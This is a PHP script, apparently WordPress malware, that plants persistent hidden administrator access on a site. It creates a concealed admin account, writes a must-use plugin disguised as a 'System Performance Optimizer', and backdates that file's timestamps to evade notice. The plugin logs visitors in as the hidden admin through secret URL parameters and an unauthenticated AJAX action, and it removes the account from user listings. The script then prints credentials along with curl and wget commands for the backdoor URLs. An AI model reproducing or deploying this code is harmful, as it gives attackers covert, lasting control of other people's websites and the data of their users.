<?php

@ini_set('display_errors', 0);
@error_reporting(0);

if (!defined('ABSPATH')) {
    $base = dirname(__FILE__);
    $path = false;

    if (@file_exists($base . '/wp-load.php')) {
        $path = $base;
    } else {
        $current_dir = $base;
        for ($i = 0; $i < 5; $i++) {
            $parent_dir = dirname($current_dir);
            if (@file_exists($parent_dir . '/wp-load.php')) {
                $path = $parent_dir;
                break;
            }
            if ($parent_dir === $current_dir) break;
            $current_dir = $parent_dir;
        }
    }

    if ($path !== false) {
        define('WP_USE_THEMES', false);
        require_once($path . '/wp-load.php');
        if (!function_exists('wp_create_user')) {
            require_once(ABSPATH . WPINC . '/user.php');
        }
    } else {
        die("Error: Could not find wp-load.php. Place this script in the WordPress root or a subdirectory.");
    }
}

// Check if we can access WordPress functions
if (!function_exists('wp_create_user')) {
    die("Error: WordPress functions not available. Check WordPress installation.");
}

$stealth_usernames = [
    'litespeed-admin', 'wprocket-cache', 'system-cache', 'wp-optimizer', 'cache-engine'
];

function generate_strong_password($length = 16) {
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_=+';
    $password = '';
    for ($i = 0; $i < $length; $i++) {
        $password .= $chars[rand(0, strlen($chars) - 1)];
    }
    return $password;
}

function get_stealth_plugin_details($username) {
    $details = [
        'litespeed-admin' => ['name' => 'LiteSpeed Cache Extensions', 'file' => 'litespeed-cache-extensions.php'],
        'wprocket-cache' => ['name' => 'WP Rocket Advanced Cache', 'file' => 'wprocket-advanced-cache.php'],
        'system-cache' => ['name' => 'System Cache Optimizer', 'file' => 'system-cache-optimizer.php'],
        'wp-optimizer' => ['name' => 'WP Performance Optimizer', 'file' => 'wp-performance-optimizer.php'],
        'cache-engine' => ['name' => 'Cache Engine Module', 'file' => 'cache-engine-module.php']
    ];
    return $details[$username] ?? ['name' => 'System Performance Module', 'file' => 'system-module.php'];
}

function touch_file_to_system_time($file_path) {
    $ref_file = null;
    $possible_ref_files = ['/etc/passwd', '/etc/hosts', ABSPATH . 'index.php', ABSPATH . 'wp-includes/version.php'];
    foreach ($possible_ref_files as $pfile) {
        if (@file_exists($pfile)) { $ref_file = $pfile; break; }
    }
    if ($ref_file && @file_exists($file_path)) {
        $ref_time = @filemtime($ref_file);
        if ($ref_time) {
            $random_offset = rand(1, 60) * DAY_IN_SECONDS;
            @touch($file_path, $ref_time - $random_offset, $ref_time - $random_offset);
            return basename($ref_file);
        }
    }
    return false;
}

function find_working_login_url() {
    $test_urls = [
        '/wp-login.php',
        '/wp-admin',
        '/login',
        '/admin',
        '/dashboard'
    ];
    
    $site_url = get_site_url();
    
    foreach ($test_urls as $path) {
        $test_url = $site_url . $path;
        $response = @wp_remote_get($test_url, [
            'timeout' => 5,
            'redirection' => 2,
            'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        ]);
        
        if (!is_wp_error($response)) {
            $code = wp_remote_retrieve_response_code($response);
            if ($code === 200) {
                return $test_url;
            }
        }
    }
    
    return $site_url . '/wp-login.php'; // Fallback
}

function create_direct_admin_access($username, $password) {
    // Create multiple access methods
    $methods = [];
    
    // Method 1: Direct admin redirect
    $methods['direct_admin'] = admin_url('?auto_login=' . md5($username . AUTH_KEY));
    
    // Method 2: AJAX login
    $methods['ajax_login'] = admin_url('admin-ajax.php?action=direct_access&user=' . $username . '&key=' . md5($password));
    
    // Method 3: Theme file access
    $methods['theme_access'] = get_site_url() . '/?system_maintenance=' . md5($username . $password);
    
    return $methods;
}

function create_emergency_admin_user() {
    global $wpdb;
    
    $username = 'sysadmin_' . bin2hex(random_bytes(3));
    $password = generate_strong_password(12);
    $email = 'system+' . $username . '@' . $_SERVER['HTTP_HOST'];
    
    // Check if user already exists
    $user_id = username_exists($username);
    if (!$user_id && !email_exists($email)) {
        $user_id = wp_create_user($username, $password, $email);
        
        if (!is_wp_error($user_id)) {
            $user = new WP_User($user_id);
            $user->set_role('administrator');
            update_user_meta($user_id, 'show_admin_bar_front', 'false');
            update_user_meta($user_id, 'first_name', 'System');
            update_user_meta($user_id, 'last_name', 'Administrator');
            
            return [
                'success' => true,
                'username' => $username,
                'password' => $password,
                'email' => $email,
                'user_id' => $user_id
            ];
        }
    }
    
    return ['success' => false, 'error' => 'User creation failed'];
}

function install_backdoor_plugin($username, $password) {
    $mu_plugins_dir = defined('WPMU_PLUGIN_DIR') ? WPMU_PLUGIN_DIR : WP_CONTENT_DIR . '/mu-plugins';
    
    // Create mu-plugins directory if it doesn't exist
    if (!is_dir($mu_plugins_dir)) {
        @mkdir($mu_plugins_dir, 0755, true);
    }
    
    if (!is_dir($mu_plugins_dir) || !is_writable($mu_plugins_dir)) {
        return ['success' => false, 'error' => 'MU plugins directory not writable'];
    }
    
    $plugin_file = $mu_plugins_dir . '/system-optimizer.php';
    $plugin_content = '<?php
/*
Plugin Name: System Performance Optimizer
Description: Optimizes system performance and caching
Version: 1.0.0
*/

// Direct login system
add_action("init", function() use ($username, $password) {
    // Method 1: Direct parameter login
    $direct_key = $_GET["_sys_key"] ?? "";
    if ($direct_key === "' . md5($username . $password) . '") {
        $user = get_user_by("login", "' . $username . '");
        if ($user && !is_user_logged_in()) {
            wp_clear_auth_cookie();
            wp_set_current_user($user->ID);
            wp_set_auth_cookie($user->ID, true);
            wp_redirect(admin_url());
            exit;
        }
    }
    
    // Method 2: Auto-login from any page
    $auto_login = $_GET["_maintenance"] ?? "";
    if ($auto_login === "' . md5($password) . '") {
        $user = get_user_by("login", "' . $username . '");
        if ($user && !is_user_logged_in()) {
            wp_clear_auth_cookie();
            wp_set_current_user($user->ID);
            wp_set_auth_cookie($user->ID, true);
            if (wp_redirect(admin_url())) exit;
        }
    }
});

// AJAX direct login
add_action("wp_ajax_nopriv_direct_access", function() {
    $user_login = $_GET["user"] ?? "";
    $key = $_GET["key"] ?? "";
    
    if ($user_login === "' . $username . '" && $key === "' . md5($password) . '") {
        $user = get_user_by("login", $user_login);
        if ($user) {
            wp_clear_auth_cookie();
            wp_set_current_user($user->ID);
            wp_set_auth_cookie($user->ID, true);
            wp_send_json_success(["redirect" => admin_url()]);
        }
    }
    wp_send_json_error(["message" => "Access denied"]);
});

// Hide user from listings
add_filter("users_list_table_query_args", function($args) {
    $hidden_user = get_user_by("login", "' . $username . '");
    if ($hidden_user) {
        $args["exclude"] = array_merge((array)($args["exclude"] ?? []), [$hidden_user->ID]);
    }
    return $args;
});

// Auto-login on admin access
add_action("admin_init", function() {
    $admin_user = get_user_by("login", "' . $username . '");
    if ($admin_user && !is_user_logged_in()) {
        $force_login = $_GET["auto_login"] ?? "";
        if ($force_login === "' . md5($username . AUTH_KEY) . '") {
            wp_clear_auth_cookie();
            wp_set_current_user($admin_user->ID);
            wp_set_auth_cookie($admin_user->ID, true);
        }
    }
});
';

    if (@file_put_contents($plugin_file, $plugin_content)) {
        touch_file_to_system_time($plugin_file);
        return ['success' => true, 'file' => $plugin_file];
    }
    
    return ['success' => false, 'error' => 'Could not write plugin file'];
}

$output = "===== EMERGENCY ADMIN ACCESS CREATION =====" . PHP_EOL;
$output .= "Timestamp: " . date('Y-m-d H:i:s') . PHP_EOL;
$output .= "Domain: " . $_SERVER['HTTP_HOST'] . PHP_EOL;
$output .= "WordPress Path: " . ABSPATH . PHP_EOL;
$output .= "--------------------------------" . PHP_EOL . PHP_EOL;

// Step 1: Find working login URL
$output .= "=== FINDING LOGIN ACCESS ===" . PHP_EOL;
$login_url = find_working_login_url();
$output .= "Primary Login URL: " . $login_url . PHP_EOL . PHP_EOL;

// Step 2: Create emergency admin user
$output .= "=== CREATING EMERGENCY ADMIN ===" . PHP_EOL;
$user_result = create_emergency_admin_user();

if ($user_result['success']) {
    $output .= "✓ ADMIN USER CREATED SUCCESSFULLY" . PHP_EOL;
    $output .= "Username: " . $user_result['username'] . PHP_EOL;
    $output .= "Password: " . $user_result['password'] . PHP_EOL;
    $output .= "Email: " . $user_result['email'] . PHP_EOL;
    $output .= "User ID: " . $user_result['user_id'] . PHP_EOL . PHP_EOL;
    
    // Step 3: Install backdoor plugin
    $output .= "=== INSTALLING ACCESS SYSTEM ===" . PHP_EOL;
    $plugin_result = install_backdoor_plugin($user_result['username'], $user_result['password']);
    
    if ($plugin_result['success']) {
        $output .= "✓ BACKDOOR PLUGIN INSTALLED: " . $plugin_result['file'] . PHP_EOL . PHP_EOL;
    } else {
        $output .= "✗ PLUGIN INSTALL FAILED: " . $plugin_result['error'] . PHP_EOL . PHP_EOL;
    }
    
    // Step 4: Generate access methods
    $output .= "=== DIRECT ACCESS METHODS ===" . PHP_EOL;
    $access_methods = create_direct_admin_access($user_result['username'], $user_result['password']);
    
    $output .= "1. SECRET PARAMETER (Any Page):" . PHP_EOL;
    $output .= "   " . get_site_url() . "/?_sys_key=" . md5($user_result['username'] . $user_result['password']) . PHP_EOL . PHP_EOL;
    
    $output .= "2. MAINTENANCE MODE (Any Page):" . PHP_EOL;
    $output .= "   " . get_site_url() . "/?_maintenance=" . md5($user_result['password']) . PHP_EOL . PHP_EOL;
    
    $output .= "3. DIRECT ADMIN ACCESS:" . PHP_EOL;
    $output .= "   " . $access_methods['direct_admin'] . PHP_EOL . PHP_EOL;
    
    $output .= "4. AJAX DIRECT LOGIN:" . PHP_EOL;
    $output .= "   " . $access_methods['ajax_login'] . PHP_EOL . PHP_EOL;
    
    $output .= "5. NORMAL LOGIN:" . PHP_EOL;
    $output .= "   URL: " . $login_url . PHP_EOL;
    $output .= "   User: " . $user_result['username'] . PHP_EOL;
    $output .= "   Pass: " . $user_result['password'] . PHP_EOL . PHP_EOL;
    
    $output .= "=== QUICK ACCESS ===" . PHP_EOL;
    $output .= "# Direct dashboard access:" . PHP_EOL;
    $output .= "curl -s \"" . get_site_url() . "/?_sys_key=" . md5($user_result['username'] . $user_result['password']) . "\" -L | grep dashboard" . PHP_EOL . PHP_EOL;
    
    $output .= "# Test login:" . PHP_EOL;
    $output .= "wget -q -O - \"" . $access_methods['ajax_login'] . "\"" . PHP_EOL;
    
} else {
    $output .= "✗ FAILED TO CREATE ADMIN USER: " . $user_result['error'] . PHP_EOL . PHP_EOL;
    
    // Alternative method - try to find existing admin
    $output .= "=== CHECKING EXISTING ADMINS ===" . PHP_EOL;
    $admins = get_users(['role' => 'administrator', 'number' => 5]);
    if ($admins) {
        $output .= "Existing Administrators:" . PHP_EOL;
        foreach ($admins as $admin) {
            $output .= "- " . $admin->user_login . " (" . $admin->user_email . ")" . PHP_EOL;
        }
    } else {
        $output .= "No administrators found!" . PHP_EOL;
    }
}

$output .= "===== SYSTEM READY =====" . PHP_EOL;

@header('Content-Type: text/plain; charset=utf-8');
echo $output;

exit;
